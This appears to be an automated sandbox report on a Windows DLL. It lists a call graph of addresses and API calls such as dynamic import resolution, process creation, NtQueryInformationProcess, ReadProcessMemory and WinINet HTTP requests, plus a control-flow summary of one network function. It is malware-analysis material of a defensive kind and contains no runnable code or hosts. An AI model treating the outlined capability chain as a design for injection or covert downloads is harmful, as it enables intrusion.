GetProcessHeap HeapFree 46113->46094 46114 6e777898 GetProcessHeap HeapAlloc 46114->46113 46115 6e7778b3 46114->46115 46116 6e77111c 62 API calls 46115->46116 46117 6e7778b8 46116->46117 46248 6e774f2b 46117->46248 46124 6e77111c 62 API calls 46123->46124 46125 6e7766bf 46124->46125 46351 6e775374 46125->46351 46127 6e7766c6 46128 6e7766d3 46127->46128 46129 6e77673d 46127->46129 46130 6e77111c 62 API calls 46128->46130 46129->45973 46129->45974 46131 6e7766de 46130->46131 46355 6e7783b2 19 API calls 46131->46355 46133 6e7766e6 GetProcessHeap HeapAlloc 46134 6e776702 46133->46134 46135 6e77673b 46133->46135 46136 6e77111c 62 API calls 46134->46136 46135->46129 46137 6e776709 46136->46137 46356 6e7783b2 19 API calls 46137->46356 46139 6e77672b GetProcessHeap HeapFree 46139->46135 46140 6e776711 46140->46139 46142 6e771128 __EH_prolog3 46141->46142 46143 6e771184 46142->46143 46357 6e77886b EnterCriticalSection 46142->46357 46143->45977 46145 6e771154 __InternalCxxFrameHandler 46145->46143 46362 6e77118e 46145->46362 46147 6e771174 46386 6e778c46 28 API calls 46147->46386 46149 6e77117e 46387 6e778821 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 46149->46387 46152 6e775d40 18 API calls 46151->46152 46153 6e77658a GetProcAddress 46152->46153 46153->45980 46155 6e775461 46154->46155 46156 6e77657f 19 API calls 46155->46156 46157 6e775495 46156->46157 46157->45997 46159 6e7765e4 46158->46159 46160 6e77657f 19 API calls 46159->46160 46161 6e77661e CreateMutexA 46160->46161 46161->46005 46163 6e77111c 62 API calls 46162->46163 46164 6e77675c 46163->46164 46165 6e77657f 19 API calls 46164->46165 46166 6e77681d 46165->46166 46167 6e77111c 62 API calls 46166->46167 46168 6e776830 46167->46168 46169 6e77657f 19 API calls 46168->46169 46170 6e7768c7 GetTempFileNameW 46169->46170 46171 6e776b59 lstrcpyW 46170->46171 46172 6e776b28 46170->46172 46173 6e776c55 46171->46173 46174 6e776c82 lstrcpyW 46171->46174 46172->46171 46173->46173 46173->46174 46443 6e771636 46174->46443 46177 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46178 6e776cd2 46177->46178 46178->46043 46180 6e773be3 64 API calls 46179->46180 46181 6e773b91 46180->46181 46477 6e773725 46181->46477 46184 6e773b9c 46481 6e774059 84 API calls 2 library calls 46184->46481 46185 6e773bda 46185->46068 46187 6e773ba4 46482 6e773961 148 API calls 46187->46482 46189 6e773bab 46189->46185 46190 6e77111c 62 API calls 46189->46190 46191 6e773bb5 46190->46191 46483 6e7751f0 19 API calls 46191->46483 46193 6e773bbc 46194 6e773725 147 API calls 46193->46194 46195 6e773bc3 46194->46195 46195->46185 46484 6e774059 84 API calls 2 library calls 46195->46484 46197 6e773bcf 46485 6e773961 148 API calls 46197->46485 46199 6e773bd6 46199->46185 46201 6e775128 46200->46201 46202 6e77657f 19 API calls 46201->46202 46203 6e77515e lstrcpyW 46202->46203 46203->46081 46205 6e77506b 46204->46205 46206 6e77657f 19 API calls 46205->46206 46207 6e7750a1 46206->46207 46207->46090 46209 6e773c0e __EH_prolog3 46208->46209 46737 6e774829 46209->46737 46211 6e773cc1 46211->46093 46212 6e773c3b 46212->46211 46213 6e774829 66 API calls 46212->46213 46214 6e77111c 62 API calls 46212->46214 46215 6e778517 20 API calls 46212->46215 46213->46212 46214->46212 46215->46212 46217 6e773f4e 46216->46217 46218 6e77657f 19 API calls 46217->46218 46219 6e773f84 46218->46219 46219->46102 46219->46103 46221 6e773021 __EH_prolog3 46220->46221 46222 6e77886b 6 API calls 46221->46222 46223 6e773078 46221->46223 46224 6e77304d 46222->46224 46223->46107 46224->46223 46785 6e7722fc 46224->46785 46228 6e773072 46808 6e778821 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 46228->46808 46241 6e7749aa 46230->46241 46245 6e7749b6 46230->46245 46231 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46232 6e774aea 46231->46232 46232->46094 46232->46113 46232->46114 46234 6e774acc 46235 6e77111c 62 API calls 46234->46235 46238 6e774ad1 46235->46238 46236 6e7749f1 GetProcessHeap HeapAlloc 46239 6e774a0a 46236->46239 46236->46245 46237 6e774a0f GetProcessHeap RtlReAllocateHeap 46240 6e774a29 GetProcessHeap HeapFree 46237->46240 46237->46245 46821 6e7752ed 19 API calls 46238->46821 46239->46245 46240->46245 46241->46231 46243 6e77111c 62 API calls 46243->46245 46245->46234 46245->46236 46245->46237 46245->46241 46245->46243 46815 6e77865c 46245->46815 46819 6e7785bb 19 API calls 46245->46819 46820 6e7752ed 19 API calls 46245->46820 46247 6e774a90 GetProcessHeap HeapFree 46247->46245 46250 6e774fae 46248->46250 46249 6e77657f 19 API calls 46251 6e774fe4 lstrcpyA 46249->46251 46250->46249 46252 6e777bc9 46251->46252 46253 6e777c01 __InternalCxxFrameHandler 46252->46253 46254 6e77111c 62 API calls 46253->46254 46255 6e777c1a 46254->46255 46256 6e77657f 19 API calls 46255->46256 46257 6e777cb1 CreateProcessA 46256->46257 46258 6e777cd3 46257->46258 46315 6e778184 46257->46315 46259 6e77111c 62 API calls 46258->46259 46261 6e777cf6 46259->46261 46260 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46262 6e7779b5 GetProcessHeap HeapFree 46260->46262 46822 6e777a4b 46261->46822 46262->46113 46264 6e777cfe 46265 6e77818a 46264->46265 46267 6e77111c 62 API calls 46264->46267 46266 6e77111c 62 API calls 46265->46266 46268 6e77818f 46266->46268 46269 6e777d24 46267->46269 46838 6e7752ed 19 API calls 46268->46838 46826 6e7755c2 46269->46826 46272 6e778196 46274 6e77111c 62 API calls 46272->46274 46273 6e777d2b 46273->46265 46275 6e77111c 62 API calls 46273->46275 46276 6e7781a2 46274->46276 46277 6e777d53 46275->46277 46839 6e775523 19 API calls 46276->46839 46282 6e77657f 19 API calls 46277->46282 46279 6e7781a9 46280 6e77111c 62 API calls 46279->46280 46281 6e7781af 46280->46281 46840 6e775261 19 API calls 46281->46840 46284 6e777dd9 46282->46284 46284->46265 46285 6e77111c 62 API calls 46284->46285 46286 6e777e19 46285->46286 46830 6e775720 19 API calls 46286->46830 46288 6e777e20 46288->46265 46289 6e77111c 62 API calls 46288->46289 46290 6e777e53 46289->46290 46831 6e77566f 19 API calls 46290->46831 46292 6e777fe9 46293 6e77111c 62 API calls 46292->46293 46294 6e778132 46293->46294 46834 6e7757bc 19 API calls 46294->46834 46295 6e77111c 62 API calls 46297 6e777e5a 46295->46297 46297->46265 46297->46295 46305 6e777ebd 46297->46305 46832 6e77566f 19 API calls 46297->46832 46298 6e77111c 62 API calls 46298->46305 46299 6e778139 46299->46265 46301 6e77111c 62 API calls 46299->46301 46302 6e778155 46301->46302 46835 6e77585b 19 API calls 46302->46835 46303 6e77657f 19 API calls 46303->46305 46305->46292 46305->46298 46305->46303 46319 6e777fee 46305->46319 46306 6e77815c 46306->46265 46307 6e77111c 62 API calls 46306->46307 46308 6e778169 46307->46308 46836 6e7758fa 19 API calls 46308->46836 46310 6e778170 46310->46265 46311 6e778174 46310->46311 46312 6e77111c 62 API calls 46311->46312 46313 6e77817d 46312->46313 46837 6e77516c 19 API calls 46313->46837 46315->46260 46316 6e7755c2 20 API calls 46316->46319 46317 6e77111c 62 API calls 46317->46319 46319->46265 46319->46292 46319->46316 46319->46317 46833 6e77566f 19 API calls 46319->46833 46320->45973 46321->45990 46322->45992 46323->46014 46324->46030 46325->46016 46326->46006 46327->46032 46328->46045 46329->46018 46330->46044 46331->46038 46332->46061 46333->46057 46334->46094 46336 6e77857d 46335->46336 46337 6e77657f 19 API calls 46336->46337 46338 6e7785b1 InternetCloseHandle 46337->46338 46338->46063 46339->46075 46340->46082 46342 6e773bfc 46341->46342 46343 6e773bec 46341->46343 46347 6e774040 GetProcessHeap HeapFree 46342->46347 46344 6e77111c 62 API calls 46343->46344 46345 6e773bf4 46344->46345 46346 6e778517 20 API calls 46345->46346 46346->46342 46347->46088 46349 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46348->46349 46350 6e784391 46349->46350 46350->46350 46352 6e7753e7 46351->46352 46353 6e77657f 19 API calls 46352->46353 46354 6e77541d 46353->46354 46354->46127 46355->46133 46356->46140 46359 6e77887f 46357->46359 46360 6e778884 LeaveCriticalSection 46359->46360 46388 6e7788f3 SleepConditionVariableCS LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 46359->46388 46360->46145 46363 6e77119d __EH_prolog3 46362->46363 46389 6e776510 46363->46389 46365 6e771224 46366 6e776510 39 API calls 46365->46366 46367 6e771272 46366->46367 46368 6e776510 39 API calls 46367->46368 46369 6e7712f5 46368->46369 46370 6e776510 39 API calls 46369->46370 46371 6e77133c 46370->46371 46372 6e776510 39 API calls 46371->46372 46373 6e771383 46372->46373 46374 6e776510 39 API calls 46373->46374 46375 6e7713d2 46374->46375 46376 6e776510 39 API calls 46375->46376 46377 6e77141d 46376->46377 46378 6e776510 39 API calls 46377->46378 46379 6e771495 46378->46379 46380 6e776510 39 API calls 46379->46380 46381 6e7714e0 46380->46381 46382 6e776510 39 API calls 46381->46382 46383 6e771559 46382->46383 46384 6e776510 39 API calls 46383->46384 46385 6e7715cb 46384->46385 46385->46147 46386->46149 46387->46143 46388->46359 46394 6e775d40 46389->46394 46395 6e775d85 46394->46395 46396 6e775da8 LoadLibraryA 46394->46396 46397 6e77886b 6 API calls 46395->46397 46404 6e775ea9 46396->46404 46398 6e775d90 46397->46398 46398->46396 46399 6e775d9a 46398->46399 46441 6e7759f0 7 API calls 46399->46441 46401 6e775da1 46442 6e778821 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 46401->46442 46403 6e775da7 46403->46396 46405 6e775f63 46404->46405 46406 6e775d40 18 API calls 46405->46406 46407 6e775f9f GetProcAddress 46406->46407 46408 6e775d40 18 API calls 46407->46408 46409 6e775fb4 46408->46409 46410 6e775d40 18 API calls 46409->46410 46411 6e77602d GetProcAddress 46410->46411 46412 6e775d40 18 API calls 46411->46412 46413 6e77603c CreateFileA 46412->46413 46415 6e776079 46413->46415 46434 6e7762ad 46413->46434 46418 6e775d40 18 API calls 46415->46418 46416 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46417 6e77650e 46416->46417 46417->46365 46419 6e7760fe GetProcAddress 46418->46419 46420 6e775d40 18 API calls 46419->46420 46421 6e77610d 46420->46421 46422 6e775d40 18 API calls 46421->46422 46423 6e776186 GetProcAddress 46422->46423 46424 6e775d40 18 API calls 46423->46424 46425 6e77619b 46424->46425 46426 6e7761b3 GetProcessHeap RtlAllocateHeap 46425->46426 46425->46434 46427 6e7761d2 46426->46427 46426->46434 46428 6e775d40 18 API calls 46427->46428 46429 6e776264 GetProcAddress 46428->46429 46430 6e775d40 18 API calls 46429->46430 46431 6e776279 ReadFile 46430->46431 46432 6e776297 GetProcessHeap HeapFree 46431->46432 46433 6e7762b2 CloseHandle 46431->46433 46432->46434 46436 6e7762c7 46433->46436 46434->46416 46435 6e7764ec GetProcessHeap HeapFree 46435->46434 46436->46435 46440 6e7763d7 46436->46440 46437 6e775d40 18 API calls 46438 6e776465 GetProcAddress 46437->46438 46439 6e775d40 18 API calls 46438->46439 46439->46440 46440->46435 46440->46436 46440->46437 46441->46401 46442->46403 46444 6e77111c 62 API calls 46443->46444 46445 6e771679 46444->46445 46465 6e777b4d 46445->46465 46447 6e771681 46448 6e77168c ObjectStublessClient9 46447->46448 46451 6e771685 46447->46451 46448->46451 46452 6e7716c5 46448->46452 46449 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46450 6e771bbf 46449->46450 46450->46177 46451->46449 46452->46451 46453 6e77111c 62 API calls 46452->46453 46454 6e77174b 46453->46454 46469 6e774e62 46454->46469 46458 6e7719ac 46459 6e7719e9 lstrcpyW 46458->46459 46460 6e77111c 62 API calls 46459->46460 46461 6e771a0b 46460->46461 46473 6e7720bd 46461->46473 46466 6e777ba9 46465->46466 46467 6e77657f 19 API calls 46466->46467 46468 6e777bb1 CoCreateInstance 46467->46468 46468->46447 46470 6e774ee5 46469->46470 46471 6e77657f 19 API calls 46470->46471 46472 6e771752 lstrcpyW lstrcatW 46471->46472 46472->46458 46472->46459 46474 6e772115 46473->46474 46475 6e77657f 19 API calls 46474->46475 46476 6e771a13 lstrcpyW wsprintfW 46475->46476 46476->46451 46479 6e77376c 46477->46479 46480 6e7737fd 46479->46480 46486 6e773519 46479->46486 46480->46184 46480->46185 46481->46187 46482->46189 46483->46193 46484->46197 46485->46199 46487 6e773525 __EH_prolog3_GS 46486->46487 46488 6e77111c 62 API calls 46487->46488 46489 6e773535 46488->46489 46514 6e772f23 46489->46514 46491 6e77353d 46492 6e77370c 46491->46492 46495 6e773548 46491->46495 46493 6e77111c 62 API calls 46492->46493 46494 6e773711 46493->46494 46544 6e7752ed 19 API calls 46494->46544 46497 6e773c02 66 API calls 46495->46497 46498 6e7736b0 46497->46498 46499 6e7736e6 46498->46499 46518 6e77315c 46498->46518 46501 6e773be3 64 API calls 46499->46501 46500 6e784386 5 API calls 46503 6e773722 46500->46503 46504 6e7736ed 46501->46504 46503->46479 46507 6e77111c 62 API calls 46504->46507 46508 6e7736e2 46504->46508 46506 6e7736c6 46506->46508 46510 6e77111c 62 API calls 46506->46510 46509 6e773702 46507->46509 46508->46500 46511 6e778517 20 API calls 46509->46511 46512 6e7736da 46510->46512 46511->46508 46513 6e778517 20 API calls 46512->46513 46513->46508 46515 6e772f7e 46514->46515 46516 6e77657f 19 API calls 46515->46516 46517 6e772fb4 InternetConnectA 46516->46517 46517->46491 46545 6e774aee 46518->46545 46520 6e773506 46521 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46520->46521 46522 6e773515 46521->46522 46522->46499 46522->46506 46523 6e773185 46523->46520 46523->46523 46564 6e774b9d 46523->46564 46526 6e773200 GetProcessHeap HeapAlloc 46527 6e7734f8 GetProcessHeap HeapFree 46526->46527 46528 6e77321b lstrcpynA 46526->46528 46527->46520 46529 6e773244 46528->46529 46583 6e77be34 46529->46583 46532 6e773257 GetProcessHeap HeapFree GetProcessHeap HeapFree 46532->46520 46533 6e774b9d 64 API calls 46541 6e773274 46533->46541 46534 6e7734da GetProcessHeap HeapFree GetProcessHeap HeapFree 46534->46520 46536 6e77332b GetProcessHeap HeapAlloc 46537 6e773343 lstrcpynA 46536->46537 46536->46541 46538 6e773352 GetProcessHeap HeapFree 46537->46538 46537->46541 46538->46541 46539 6e778228 7 API calls 46539->46541 46541->46533 46541->46534 46541->46536 46541->46539 46543 6e7734d7 46541->46543 46586 6e774cc5 46541->46586 46602 6e773082 lstrlenA 46541->46602 46622 6e778207 GetProcessHeap HeapFree 46541->46622 46543->46534 46544->46508 46546 6e774b10 46545->46546 46547 6e774b1b 46545->46547 46550 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46546->46550 46548 6e77111c 62 API calls 46547->46548 46549 6e774b30 46548->46549 46551 6e773efc 19 API calls 46549->46551 46552 6e774b99 46550->46552 46553 6e774b38 46551->46553 46552->46523 46554 6e77111c 62 API calls 46553->46554 46555 6e774b3d 46554->46555 46623 6e7752ed 19 API calls 46555->46623 46557 6e774b44 46557->46546 46558 6e774b49 GetProcessHeap HeapAlloc 46557->46558 46558->46546 46559 6e774b60 46558->46559 46560 6e77111c 62 API calls 46559->46560 46561 6e774b6f 46560->46561 46562 6e773efc 19 API calls 46561->46562 46563 6e774b77 46562->46563 46563->46546 46565 6e77111c 62 API calls 46564->46565 46566 6e774bb0 46565->46566 46624 6e7746b4 46566->46624 46568 6e7731ee 46568->46526 46568->46527 46569 6e774bb8 46569->46568 46570 6e77111c 62 API calls 46569->46570 46571 6e774be6 46570->46571 46628 6e774733 19 API calls 46571->46628 46573 6e774bee 46574 6e77111c 62 API calls 46573->46574 46581 6e774c4a 46573->46581 46576 6e774c42 46574->46576 46575 6e77111c 62 API calls 46577 6e774c9e 46575->46577 46629 6e7747ae 19 API calls 46576->46629 46630 6e774733 19 API calls 46577->46630 46580 6e774ca6 46580->46568 46582 6e774cb0 lstrlenA 46580->46582 46581->46575 46582->46568 46631 6e77be4e 46583->46631 46587 6e774cee 46586->46587 46588 6e77111c 62 API calls 46587->46588 46589 6e774d19 46588->46589 46590 6e77657f 19 API calls 46589->46590 46591 6e774d7c 46590->46591 46592 6e77111c 62 API calls 46591->46592 46600 6e774e47 46591->46600 46593 6e774de0 46592->46593 46659 6e7747ae 19 API calls 46593->46659 46595 6e774de8 46596 6e77111c 62 API calls 46595->46596 46597 6e774e3b 46596->46597 46660 6e774733 19 API calls 46597->46660 46599 6e774e43 46599->46600 46601 6e774e4b lstrlenA 46599->46601 46600->46541 46601->46600 46661 6e772c18 46602->46661 46605 6e7730c7 lstrlenA 46607 6e773015 71 API calls 46605->46607 46606 6e77314b 46608 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46606->46608 46609 6e7730e1 46607->46609 46610 6e773158 46608->46610 46677 6e77268b 46609->46677 46610->46541 46613 6e7730f8 46614 6e77313f GetProcessHeap HeapFree 46613->46614 46614->46606 46615 6e773015 71 API calls 46616 6e77310a 46615->46616 46617 6e773110 GetProcessHeap HeapFree 46616->46617 46619 6e77111c 62 API calls 46616->46619 46617->46614 46620 6e773128 46619->46620 46725 6e771fff 46620->46725 46622->46541 46623->46557 46625 6e7746ef 46624->46625 46626 6e77657f 19 API calls 46625->46626 46627 6e774725 46626->46627 46627->46569 46628->46573 46629->46581 46630->46580 46632 6e77be75 46631->46632 46633 6e77be5e 46631->46633 46632->46633 46635 6e77be7b 46632->46635 46652 6e77d59b 14 API calls _free 46633->46652 46637 6e77bea1 46635->46637 46638 6e77be8a 46635->46638 46636 6e77be63 46653 6e77d4de 25 API calls ___std_exception_copy 46636->46653 46639 6e77bd8f __fassign 37 API calls 46637->46639 46654 6e77d59b 14 API calls _free 46638->46654 46642 6e77beac 46639->46642 46644 6e77beb4 46642->46644 46647 6e77bec8 46642->46647 46643 6e77be8f 46655 6e77d4de 25 API calls ___std_exception_copy 46643->46655 46656 6e77c10d 26 API calls 3 library calls 46644->46656 46649 6e77324f 46647->46649 46650 6e77bfa1 46647->46650 46657 6e77d59b 14 API calls _free 46647->46657 46649->46532 46649->46541 46658 6e77d59b 14 API calls _free 46650->46658 46652->46636 46653->46649 46654->46643 46655->46649 46656->46649 46657->46647 46658->46649 46659->46595 46660->46599 46662 6e77111c 62 API calls 46661->46662 46663 6e772c4d 46662->46663 46729 6e77220f 46663->46729 46666 6e772c9e 46670 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46666->46670 46667 6e772c59 GetProcessHeap HeapAlloc 46667->46666 46668 6e772c70 46667->46668 46669 6e77111c 62 API calls 46668->46669 46671 6e772c83 46669->46671 46672 6e772cac 46670->46672 46673 6e77220f 19 API calls 46671->46673 46672->46605 46672->46606 46674 6e772c8b 46673->46674 46675 6e772c8f GetProcessHeap HeapFree 46674->46675 46676 6e772cae 46674->46676 46675->46666 46676->46666 46678 6e7726cf lstrcpyW 46677->46678 46679 6e772929 46677->46679 46681 6e77111c 62 API calls 46678->46681 46682 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46679->46682 46683 6e772795 46681->46683 46684 6e772938 46682->46684 46733 6e771d91 19 API calls 46683->46733 46684->46613 46684->46615 46686 6e77279d 46686->46679 46687 6e7727a5 GetProcessHeap HeapAlloc 46686->46687 46687->46679 46688 6e7727c5 lstrcpyW 46687->46688 46690 6e77111c 62 API calls 46688->46690 46691 6e772911 46690->46691 46734 6e771d91 19 API calls 46691->46734 46693 6e772919 46694 6e77291d GetProcessHeap HeapFree 46693->46694 46695 6e77293c GetProcessHeap HeapAlloc 46693->46695 46694->46679 46695->46694 46696 6e772956 46695->46696 46698 6e77111c 62 API calls 46696->46698 46699 6e77296a 46698->46699 46700 6e77657f 19 API calls 46699->46700 46701 6e772a04 46700->46701 46702 6e772a3d 46701->46702 46703 6e772a18 GetProcessHeap HeapFree 46701->46703 46705 6e77111c 62 API calls 46702->46705 46704 6e772a33 GetProcessHeap HeapFree 46703->46704 46704->46679 46706 6e772a45 46705->46706 46707 6e77657f 19 API calls 46706->46707 46708 6e772ad2 46707->46708 46709 6e772ae3 46708->46709 46710 6e772b11 46708->46710 46711 6e77111c 62 API calls 46709->46711 46712 6e77111c 62 API calls 46710->46712 46713 6e772aeb 46711->46713 46714 6e772b1c 46712->46714 46735 6e771e3c 19 API calls 46713->46735 46717 6e77657f 19 API calls 46714->46717 46716 6e772af3 GetProcessHeap HeapFree 46716->46704 46718 6e772bb6 46717->46718 46719 6e77111c 62 API calls 46718->46719 46720 6e772bc9 46719->46720 46736 6e771e3c 19 API calls 46720->46736 46722 6e772bd1 GetProcessHeap HeapFree 46723 6e772beb GetProcessHeap HeapFree 46722->46723 46724 6e772bfa 46722->46724 46723->46679 46724->46679 46726 6e77206d 46725->46726 46727 6e77657f 19 API calls 46726->46727 46728 6e7720a3 46727->46728 46728->46617 46730 6e772279 46729->46730 46731 6e77657f 19 API calls 46730->46731 46732 6e7722af 46731->46732 46732->46666 46732->46667 46733->46686 46734->46693 46735->46716 46736->46722 46738 6e77488c 46737->46738 46739 6e77111c 62 API calls 46738->46739 46740 6e7748cf 46739->46740 46770 6e773da7 46740->46770 46742 6e7748d7 46743 6e774963 46742->46743 46744 6e7748e3 46742->46744 46746 6e77111c 62 API calls 46743->46746 46745 6e77111c 62 API calls 46744->46745 46747 6e7748f3 46745->46747 46748 6e774968 46746->46748 46774 6e778463 46747->46774 46784 6e7752ed 19 API calls 46748->46784 46752 6e774927 46754 6e77111c 62 API calls 46752->46754 46753 6e77111c 62 API calls 46756 6e77491f 46753->46756 46757 6e774934 46754->46757 46755 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46758 6e774981 46755->46758 46782 6e774608 19 API calls 46756->46782 46778 6e773e54 46757->46778 46758->46212 46761 6e77493c 46762 6e77111c 62 API calls 46761->46762 46769 6e77495e 46761->46769 46763 6e774945 46762->46763 46783 6e7752ed 19 API calls 46763->46783 46765 6e77494c 46766 6e77111c 62 API calls 46765->46766 46767 6e774956 46766->46767 46768 6e778517 20 API calls 46767->46768 46768->46769 46769->46755 46771 6e773e02 46770->46771 46772 6e77657f 19 API calls 46771->46772 46773 6e773e38 HttpOpenRequestA 46772->46773 46773->46742 46775 6e7784ce 46774->46775 46776 6e77657f 19 API calls 46775->46776 46777 6e774905 46776->46777 46777->46752 46777->46753 46779 6e773eaf 46778->46779 46780 6e77657f 19 API calls 46779->46780 46781 6e773ee9 HttpSendRequestA 46780->46781 46781->46761 46782->46752 46783->46765 46784->46769 46786 6e772381 46785->46786 46787 6e7723a9 lstrcpyW 46785->46787 46786->46787 46788 6e77111c 62 API calls 46787->46788 46789 6e7723c9 46788->46789 46809 6e771bf5 46789->46809 46793 6e77111c 62 API calls 46794 6e77245f 46793->46794 46795 6e771bf5 19 API calls 46794->46795 46796 6e772467 HeapAlloc 46795->46796 46798 6e7724b6 46796->46798 46799 6e772481 46796->46799 46814 6e772cf7 66 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 46798->46814 46813 6e772561 64 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 46799->46813 46802 6e7724a9 HeapFree 46802->46798 46803 6e7724bb 46804 6e778727 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 46803->46804 46806 6e7724cd 46804->46806 46807 6e778c46 28 API calls 46806->46807 46807->46228 46808->46223 46810 6e771c7c 46809->46810 46811 6e77657f 19 API calls 46810->46811 46812 6e771cb6 lstrcpyW 46811->46812 46812->46793 46813->46802 46814->46803 46816 6e7786dd 46815->46816 46817 6e77657f 19 API calls 46816->46817 46818 6e778717 InternetQueryDataAvailable 46817->46818 46818->46245 46819->46245 46820->46247 46821->46241 46823 6e777ac9 46822->46823 46824 6e77657f 19 API calls 46823->46824 46825 6e777aff NtQueryInformationProcess 46824->46825 46825->46264 46828 6e775620 46826->46828 46827 6e77657f 19 API calls 46829 6e77565a ReadProcessMemory 46827->46829 46828->46827 46829->46273 46830->46288 46831->46297 46832->46297 46833->46319 46834->46299 46835->46306 46836->46310 46837->46315 46838->46272 46839->46279 46840->46315 46841 6e7d4223 46842 6e7d422f ___unDNameEx 46841->46842 46857 6e7d3f57 46842->46857 46844 6e7d423b ___scrt_is_nonwritable_in_current_image 46845 6e7d4236 46845->46844 46846 6e7d4325 46845->46846 46847 6e7d4260 46845->46847 46877 6e7d4a3c IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46846->46877 46868 6e7d3eb9 46847->46868 46850 6e7d432c 46852 6e7d426f __RTC_Initialize 46856 6e7d429c 46852->46856 46871 6e7d4f33 RtlInitializeSListHead 46852->46871 46854 6e7d427d ___scrt_initialize_default_local_stdio_options 46854->46856 46872 6e7d3e8e 46854->46872 46876 6e7d431b ___scrt_release_startup_lock 46856->46876 46858 6e7d3f60 46857->46858 46878 6e7d4c91 IsProcessorFeaturePresent 46858->46878 46860 6e7d3f6c 46879 6e7d849d 46860->46879 46862 6e7d3f71 46863 6e7d3f75 46862->46863 46888 6e7f6104 46862->46888 46863->46845 46866 6e7d3f8c 46866->46845 46935 6e7d3f90 46868->46935 46870 6e7d3ec0 46870->46852 46871->46854 46873 6e7d3e93 46872->46873 46875 6e7d3e9c 46873->46875 46942 6e7d4c91 IsProcessorFeaturePresent 46873->46942 46875->46856 46876->46844 46877->46850 46878->46860 46880 6e7d84a2 ___vcrt_initialize_winapi_thunks 46879->46880 46892 6e7d98f7 46880->46892 46883 6e7d84b0 46883->46862 46885 6e7d84b8 46886 6e7d84c3 46885->46886 46906 6e7d9948 RtlDeleteCriticalSection 46885->46906 46886->46862 46931 6e804a84 46888->46931 46891 6e7d84dc 7 API calls 3 library calls 46891->46863 46894 6e7d9900 46892->46894 46895 6e7d9929 46894->46895 46896 6e7d84ac 46894->46896 46907 6e7d9d02 46894->46907 46912 6e7d9948 RtlDeleteCriticalSection 46895->46912 46896->46883 46898 6e7d8981 46896->46898 46924 6e7d9c13 46898->46924 46902 6e7d89a4 46903 6e7d89b1 46902->46903 46930 6e7d89b4 5 API calls ___vcrt_FlsFree 46902->46930 46903->46885 46905 6e7d8996 46905->46885 46906->46883 46913 6e7d9ad2 46907->46913 46909 6e7d9d1c 46910 6e7d9d3a InitializeCriticalSectionAndSpinCount 46909->46910 46911 6e7d9d25 46909->46911 46910->46911 46911->46894 46912->46896 46914 6e7d9afa 46913->46914 46916 6e7d9af6 __crt_fast_encode_pointer 46913->46916 46914->46916 46917 6e7d9a0e 46914->46917 46916->46909 46918 6e7d9a1d try_get_first_available_module 46917->46918 46919 6e7d9a3a LoadLibraryExW 46918->46919 46921 6e7d9ab0 FreeLibrary 46918->46921 46922 6e7d9ac7 46918->46922 46923 6e7d9a88 LoadLibraryExW 46918->46923 46919->46918 46920 6e7d9a55 GetLastError 46919->46920 46920->46918 46921->46918 46922->46916 46923->46918 46925 6e7d9ad2 try_get_function 4 API calls 46924->46925 46926 6e7d9c2d 46925->46926 46927 6e7d9c46 TlsAlloc 46926->46927 46928 6e7d898b 46926->46928 46928->46905 46929 6e7d9cc4 5 API calls try_get_function 46928->46929 46929->46902 46930->46905 46934 6e804a9d 46931->46934 46932 6e7d3a8f UnDecorator::getZName 4 API calls 46933 6e7d3f7e 46932->46933 46933->46866 46933->46891 46934->46932 46936 6e7d3f9f 46935->46936 46937 6e7d3fa3 46935->46937 46936->46870 46938 6e7d3fb0 46937->46938 46941 6e7d4a3c IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46937->46941 46938->46870 46940 6e7d4034 46941->46940 46942->46875

                                                      Executed Functions

                                                      Function 6E77865C, Relevance: 38.6, APIs: 1, Strings: 21, Instructions: 73networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 695 6e77865c-6e7786db 696 6e7786dd-6e7786e2 695->696 697 6e77870c-6e778724 call 6e77657f InternetQueryDataAvailable 695->697 699 6e7786e3-6e778703 696->699 699->699 701 6e778705-6e77870b 699->701 701->697
